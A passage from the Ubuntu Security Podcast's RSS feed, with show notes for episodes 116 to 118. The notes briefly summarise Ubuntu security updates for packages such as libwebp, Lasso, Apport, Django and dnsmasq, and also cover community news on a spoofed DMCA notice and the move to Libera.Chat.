if not used it will keep running&hellip;</li>
</ul>
<h3 id="usn-4970-1-gupnp-vulnerability-03-15">[<a href="https://ubuntu.com/security/notices/USN-4970-1">USN-4970-1</a>] GUPnP vulnerability [03:15]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-33516">CVE-2021-33516</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>DNS rebinding attack - able to be exploited by a remote web server -
cause the local web browser into triggering actions against local UPnP
services that use gupnp library as it would not check that the Host
header specified the expected IP address. Could then be used for data
exfil / tampering etc.</li>
<li>Can be mitigated against by using a DNS resolver that prevents DNS
rebinding</li>
</ul>
<h3 id="usn-4971-1-libwebp-vulnerabilities-04-11">[<a href="https://ubuntu.com/security/notices/USN-4971-1">USN-4971-1</a>] libwebp vulnerabilities [04:11]</h3>
<ul>
<li>11 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-36332">CVE-2020-36332</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36331">CVE-2020-36331</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36330">CVE-2020-36330</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36329">CVE-2020-36329</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36328">CVE-2020-36328</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-25014">CVE-2018-25014</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-25013">CVE-2018-25013</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-25012">CVE-2018-25012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-25011">CVE-2018-25011</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-25010">CVE-2018-25010</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-25009">CVE-2018-25009</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Google&rsquo;s image format to relace both jpg/png and be faster (like vp8
video codec using predictive encoding - uses neighboring pixels to
predict values in a block and then encodes only the difference)</li>
<li>C library :( - memory unsafe</li>
<li>OOB reads, heap buffer overflow, UAF, excessive memory allocation etc
<ul>
<li>DoS, RCE etc</li>
</ul>
</li>
</ul>
<h3 id="usn-4972-1-postgresql-vulnerabilities-05-05">[<a href="https://ubuntu.com/security/notices/USN-4972-1">USN-4972-1</a>] PostgreSQL vulnerabilities [05:05]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-32029">CVE-2021-32029</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32028">CVE-2021-32028</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32027">CVE-2021-32027</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Thanks to Christian Ehrhardt from the Ubuntu Server team for preparing
these updates</li>
<li>Latest upstream point-releases
<ul>
<li>10.17 - 18.04</li>
<li>12.7 - 20.04 LTS, 20.10</li>
<li>13.3 - 21.04</li>
</ul>
</li>
</ul>
<h3 id="usn-4973-1-python-vulnerability-05-44">[<a href="https://ubuntu.com/security/notices/USN-4973-1">USN-4973-1</a>] Python vulnerability [05:44]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-29921">CVE-2021-29921</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>ipaddress library in the python stdlib mishandled leading zero characters
in octets of an IP address - could allow bypass of access controls that
are based on IP addresses. Now treats leading zeros as invalid input
(before would try and treat them as octal&hellip; but could end up confused as
a result)</li>
</ul>
<h3 id="usn-4974-1-lasso-vulnerability-06-40">[<a href="https://ubuntu.com/security/notices/USN-4974-1">USN-4974-1</a>] Lasso vulnerability [06:40]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-28091">CVE-2021-28091</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>SAML protocol library</li>
<li>Reported by Akamai (uses Lasso in their Enterprise Application Access
product) - and coordinated between affected distros and vendors etc</li>
<li>Could allow unauthenticated access to applications that use SAMLv2
(Security Assertion Markup Language v2) for authentication</li>
<li>If a SAML response contained both a signed and valid assertion, plus
additional unsigned assertions appened to this, these unsigned assertions
would be treated as valid as well.</li>
<li>So could allow an authenticated user to take their own signed SAML
assertion and append assertions for other users to the end to then
impersonate those other users.</li>
<li><a href="https://blogs.akamai.com/2021/06/saml-implementation-vulnerability-impacting-some-akamai-services.html">https://blogs.akamai.com/2021/06/saml-implementation-vulnerability-impacting-some-akamai-services.html</a></li>
</ul>
<h3 id="usn-4975-1-django-vulnerabilities-08-19">[<a href="https://ubuntu.com/security/notices/USN-4975-1">USN-4975-1</a>] Django vulnerabilities [08:19]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-33571">CVE-2021-33571</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33203">CVE-2021-33203</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32052">CVE-2021-32052</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>URLValidator failed to properly handle newlines, tabs - could be used to
inject other headers into responses etc</li>
<li>Paths not properly sanitized in the admindocs module - could be used to
probe for the existence of files or possibly obtain their contents</li>
<li>Leading zeros in IPv4 addresses - basically identical to the Python issue
above</li>
</ul>
<h3 id="usn-4976-1-dnsmasq-vulnerability-08-56">[<a href="https://ubuntu.com/security/notices/USN-4976-1">USN-4976-1</a>] Dnsmasq vulnerability [08:56]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3448">CVE-2021-3448</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to properly randomise source port (ie used a fixed port) when
forwarding queries when configured to use a specific server for a given
network interface - could then allow a remote attacker to more easily
perform cache poisoning attacks (ie just need to guess the transmission
ID once know the source port to get a forged reply accepted)
<ul>
<li>Very similar to the issues that were discovered back in 2008 by Dan
Kaminsky - the whole reason source port randomisation was introduced as
part of the DNS protocol</li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-user-s-dmca-violation-09-58">Ubuntu user&rsquo;s DMCA violation [09:58]</h3>
<ul>
<li>Last week was <a href="https://torrentfreak.com/comcast-subscriber-receives-dmca-notice-for-downloading-ubuntu-210526/">reported</a> that a user downloading Ubuntu 20.04.2 iso via
bittorrent received a DMCA violation notice from their ISP (Comcast)</li>
<li>Clearly absurd given Ubuntu is free (beer &amp; freedom/libre)</li>
<li>Also the hash of the iso in question was legit too</li>
<li>Sent by &ldquo;OpSec Online Antipiracy&rdquo; not Canonical</li>
<li>OpSec <a href="https://torrentfreak.com/opsec-says-dmca-notice-system-was-spoofed-to-target-ubuntu-download-210527/">responded</a> saying their notice sending program was &ldquo;spoofed&rdquo; by
unknown parties across multiple streaming platforms</li>
<li>Not clear then if the user spoofed it directly or if someone else spoofed
the notice and sent it to the user&hellip;</li>
<li>Still being investigated by OpSec apparently - our legal team is also
looking into it as well</li>
<li>Not the first time this sort of thing has happened - <a href="https://torrentfreak.com/paramount-wipes-infringing-ubuntu-torrent-google-160909/">back in 2016</a>
Paramount Pictures used the DMCA to send a takedown request to Google to
remove a search result linking to the Ubuntu 12.04.2 alternate ISO at
extratorrent.cc - this was listed as apparently being a link to the
Transformers: Age of Extinction movie&hellip;
<ul>
<li>Google did follow through on this - likely an automated system due to
the sheer volume of such requests they get per day (3 million p/d
pirate URLs to be removed from search results)</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E118.mp3" length="10194405" type="audio/mpeg" /><itunes:duration>13:34</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 117
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-117/</link>
          <pubDate>Fri, 28 May 2021 17:21:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>b0fe6e834504138a02a53fc582738b0270b774195bf6c3446e05050d7108d69926ad7176e74b451917944499bceca1ad1cfebb94d5868c0ecc4f2dfb26a42ad9</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 117</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week we're talking about moving IRC networks plus security updates for Pillow, Babel, Apport, X11 and more.
        
        ]]></itunes:subtitle>
        <itunes:summary>This week we're talking about moving IRC networks plus security updates for Pillow, Babel, Apport, X11 and more.</itunes:summary>
        <description>This week we're talking about moving IRC networks plus security updates for Pillow, Babel, Apport, X11 and more.</description>
        <googleplay:description>This week we're talking about moving IRC networks plus security updates for Pillow, Babel, Apport, X11 and more.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we&rsquo;re talking about moving IRC networks plus security updates for Pillow, Babel, Apport, X11 and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>24 unique CVEs addressed</p>
<h3 id="usn-4963-1-pillow-vulnerabilities-00-55">[<a href="https://ubuntu.com/security/notices/USN-4963-1">USN-4963-1</a>] Pillow vulnerabilities [00:55]</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-28678">CVE-2021-28678</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28677">CVE-2021-28677</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28676">CVE-2021-28676</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28675">CVE-2021-28675</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-25288">CVE-2021-25288</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-25287">CVE-2021-25287</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Python image handling library - used by many other packages for their
image handling</li>
<li>All DoS issues via OOB read and similar so not critical</li>
</ul>
<h3 id="usn-4962-1-babel-vulnerability-01-31">[<a href="https://ubuntu.com/security/notices/USN-4962-1">USN-4962-1</a>] Babel vulnerability [01:31]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-20095">CVE-2021-20095</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Internationalisation handling for python apps</li>
<li>Directory traversal flaw - could be exploited to load arbitrary locale
.dat files - these contain serialized Python objects - so hence can get
arbitrary code execution as a result.</li>
<li>Could use relative path to specify a file outside the locate-data
directory</li>
</ul>
<h3 id="usn-4964-1-exiv2-vulnerabilities-02-25">[<a href="https://ubuntu.com/security/notices/USN-4964-1">USN-4964-1</a>] Exiv2 vulnerabilities [02:25]</h3>
<ul>
<li>5 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-29623">CVE-2021-29623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32617">CVE-2021-32617</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29473">CVE-2021-29473</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29464">CVE-2021-29464</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29463">CVE-2021-29463</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>CLI util and library (C++) for reading+modifying metadata in image
files - more exiv2 - last only in <a href="https://ubuntusecuritypodcast.org/episode-115/">Episode 115</a></li>
<li>OOB reads on metadata write</li>
<li>heap buffer overflow on m w</li>
<li>quadratic complexity algorithm on metadata write - DoS</li>
<li>stack info leak on m r</li>
</ul>
<h3 id="usn-4965-1-usn-4965-2-apport-vulnerabilities-03-19">[<a href="https://ubuntu.com/security/notices/USN-4965-1">USN-4965-1</a>, <a href="https://ubuntu.com/security/notices/USN-4965-2">USN-4965-2</a>] Apport vulnerabilities [03:19]</h3>
<ul>
<li>11 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-32557">CVE-2021-32557</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32556">CVE-2021-32556</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32555">CVE-2021-32555</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32554">CVE-2021-32554</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32553">CVE-2021-32553</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32552">CVE-2021-32552</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32551">CVE-2021-32551</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32550">CVE-2021-32550</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32549">CVE-2021-32549</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32548">CVE-2021-32548</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32547">CVE-2021-32547</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Seems it&rsquo;s time for more Apport vulns - every quarter or so</li>
<li>Arbitrary file read / write vulns discovered by Maik Münch</li>
<li>Apport parses various details out of /proc and some of these can be
crafted by the process, ie process name, current working dir etc - and
then goes to gather files etc - and so if can craft these details can get
it to read files which weren&rsquo;t intended via symlinks etc (mitigated by
symlink protections in Ubuntu) - or from injection of data into say dpkg
queries to get it to include other files like /etc/passwd since this
operation happens as root by apport</li>
<li>These end up in the crash dump and this can be read by the regular user</li>
<li>Also when uploading via whoopsie, race condition where crash dump can be
replaced by a symlink and then the crash dump will be written to the dest
of the symlink - file write vuln - but again mitigated by
symlink-restriction</li>
</ul>
<h3 id="usn-4966-1-usn-4966-2-libx11-vulnerability-05-57">[<a href="https://ubuntu.com/security/notices/USN-4966-1">USN-4966-1</a>, <a href="https://ubuntu.com/security/notices/USN-4966-2">USN-4966-2</a>] libx11 vulnerability [05:57]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-31535">CVE-2021-31535</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>When looking up a color, failed to properly validate it - app could then
get extra X protocol requests sent to the X server - ie. could then
disable X server authorisation etc so remote attackers could connect to
the local X server and snoop on inputs etc</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-hardened-ubuntu-security-on-libera-dot-chat-06-45">#ubuntu-hardened -&gt; #ubuntu-security on Libera.Chat [06:45]</h3>
<ul>
<li>LWN writeup <a href="https://lwn.net/Articles/857140/">https://lwn.net/Articles/857140/</a></li>
<li>Volunteer staff resigned en masse after network was taken over by tech
entrepreneur</li>
<li><a href="https://lists.ubuntu.com/archives/ubuntu-irc/2021-May/001922.html">Ubuntu IRC council voted and approved a resolution to recommend moving
Ubuntu IRC channels from freenode to Libera.Chat</a></li>
<li><a href="https://lists.ubuntu.com/archives/ubuntu-irc/2021-May/001923.html">Community Council approved this</a> so now all channels have moved to
Libera.Chat</li>
<li>Almost all of the old channels on freenode have now all been taken over
by the new freenode staff</li>
<li>irc.ubuntu.com now redirects to irc.libera.chat</li>
<li>Finally took the opportunity to rename our channel - #ubuntu-security</li>
<li>Come join us</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E117.mp3" length="8030524" type="audio/mpeg" /><itunes:duration>09:40</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 116
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-116/</link>
          <pubDate>Fri, 21 May 2021 13:41:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>1a650790abdc9caca0d4bbf48df08c5998756a50cb38c9d5e15c95555f4a7e07219cbf290ae72d2afca2798de8649aebc2ba1404c5c58996e6058ebf5fdd7fba</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 116</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          With 60 CVEs fixed across MySQL, Django, Please and the Linux kernel this
  week we take a look at some of these details, plus look at the recent
  announcement of 1Password for Linux and some open positions on the team
  too.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  With 60 CVEs fixed across MySQL, Django, Please and the Linux kernel this
  week we take a look at some of these details, plus look at the recent
  announcement of 1Password for Linux and some open positions on the team
  too.
  </itunes:summary>
        <description>  With 60 CVEs fixed across MySQL, Django, Please and the Linux kernel this
  week we take a look at some of these details, plus look at the recent
  announcement of 1Password for Linux and some open positions on the team
  too.
  </description>
        <googleplay:description>  With 60 CVEs fixed across MySQL, Django, Please and the Linux kernel this
  week we take a look at some of these details, plus look at the recent
  announcement of 1Password for Linux and some open positions on the team
  too.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>With 60 CVEs fixed across MySQL, Django, Please and the Linux kernel this
week we take a look at some of these details, plus look at the recent
announcement of 1Password for Linux and some open positions on the team
too.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>60 unique CVEs addressed</p>
<h3 id="usn-4952-1-mysql-vulnerabilities-00-58">[<a href="https://ubuntu.com/security/notices/USN-4952-1">USN-4952-1</a>] MySQL vulnerabilities [00:58]</h3>
<ul>
<li>33 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-2308">CVE-2021-2308</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2307">CVE-2021-2307</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2305">CVE-2021-2305</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2304">CVE-2021-2304</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2301">CVE-2021-2301</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2300">CVE-2021-2300</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2299">CVE-2021-2299</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2298">CVE-2021-2298</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2293">CVE-2021-2293</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2278">CVE-2021-2278</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2232">CVE-2021-2232</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2230">CVE-2021-2230</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2226">CVE-2021-2226</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2217">CVE-2021-2217</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2215">CVE-2021-2215</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2212">CVE-2021-2212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2208">CVE-2021-2208</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2203">CVE-2021-2203</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2201">CVE-2021-2201</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2196">CVE-2021-2196</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2194">CVE-2021-2194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2193">CVE-2021-2193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2180">CVE-2021-2180</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2179">CVE-2021-2179</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2172">CVE-2021-2172</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2171">CVE-2021-2171</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2170">CVE-2021-2170</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2169">CVE-2021-2169</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2166">CVE-2021-2166</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2164">CVE-2021-2164</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2162">CVE-2021-2162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2154">CVE-2021-2154</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2146">CVE-2021-2146</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest upstream point releases - includes both security <strong>and</strong> bug fixes and
possibly incompatible changes etc</li>
<li>MySQL has been updated to 8.0.25 in Ubuntu 20.04 LTS, Ubuntu 20.10, and
Ubuntu 21.04. Ubuntu 18.04 LTS has been updated to MySQL 5.7.34.</li>
</ul>
<h3 id="usn-4932-2-django-vulnerability-01-37">[<a href="https://ubuntu.com/security/notices/USN-4932-2">USN-4932-2</a>] Django vulnerability [01:37]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-31542">CVE-2021-31542</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-114/">Episode 114</a> - directory traversal via file upload</li>
</ul>
<h3 id="usn-4953-1-awstats-vulnerabilities-01-56">[<a href="https://ubuntu.com/security/notices/USN-4953-1">USN-4953-1</a>] AWStats vulnerabilities [01:56]</h3>
<ul>
<li>3 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-1000501">CVE-2017-1000501</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-35176">CVE-2020-35176</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29600">CVE-2020-29600</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>A-W-Stats - Advanced Web Statistics - log analyzer etc</li>
<li>Incomplete fix for old CVE-2017-1000501 - this itself was incomplete
too - hence CVE-2020-35176
<ul>
<li>Could be used to read an arbitrary file on the webserver via the config
parameter - and this could allow code execution as this was not
sanitised properly</li>
</ul>
</li>
</ul>
<h3 id="usn-4954-1-gnu-c-library-vulnerabilities-03-00">[<a href="https://ubuntu.com/security/notices/USN-4954-1">USN-4954-1</a>] GNU C Library vulnerabilities [03:00]</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2009-5155">CVE-2009-5155</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6096">CVE-2020-6096</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>ARMv7 specific issue - memcpy() undefined behaviour if a negative length
were specified</li>
<li>DoS (assertion failure + abort) via crafted regex - so should not be
passing untrusted regular expressions to posix regex implementation</li>
</ul>
<h3 id="usn-4628-3-intel-microcode-vulnerabilities-04-08">[<a href="https://ubuntu.com/security/notices/USN-4628-3">USN-4628-3</a>] Intel Microcode vulnerabilities [04:08]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8698">CVE-2020-8698</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8696">CVE-2020-8696</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8695">CVE-2020-8695</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-96/">Episode 96</a> - RAPL side-channel etc - corresponding update for some Xeon
processors</li>
</ul>
<h3 id="usn-4955-1-please-vulnerabilities-04-44">[<a href="https://ubuntu.com/security/notices/USN-4955-1">USN-4955-1</a>] Please vulnerabilities [04:44]</h3>
<ul>
<li>3 CVEs addressed in Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-31155">CVE-2021-31155</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31154">CVE-2021-31154</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31153">CVE-2021-31153</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>sudo replacement written in rust</li>
<li>Code analysis by Matthias Gerstner @ SuSE -
<ul>
<li>arbitrary file existence test and open (eg could open /dev/zero and
consume memory -&gt; OOM)</li>
<li>unsafe permissions for token directory - create world-writable - can
allow an unprivileged user to get root privileges quite easily by
creating their own token as though they had authenticated</li>
<li>pleaseedit uses predictable paths in /tmp - without symlink protections
could allow a user to change ownership of arbitrary files as it would
follow symlinks</li>
</ul>
</li>
<li>rust is not a panacea - not all vulnerabilities are memory corruption and
writing setuid root binaries is always going to be challenging</li>
</ul>
<h3 id="lsn-0077-1-linux-kernel-vulnerability-07-04">[<a href="https://lists.ubuntu.com/archives/ubuntu-security-announce/2021-May/006028.html">LSN-0077-1</a>] Linux kernel vulnerability [07:04]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3492">CVE-2021-3492</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>shiftfs specific vuln reported via ZDI (found by Vincent Dehors) - Ubuntu
carry this as an out-of-tree patch so doesn&rsquo;t affect upstream kernel
(used by LXD etc for UID mapping in containers)</li>
<li>Failed to handle faults in copy_from_user() -&gt; double-free or possible
memory leak -&gt; code execution/DoS</li>
</ul>
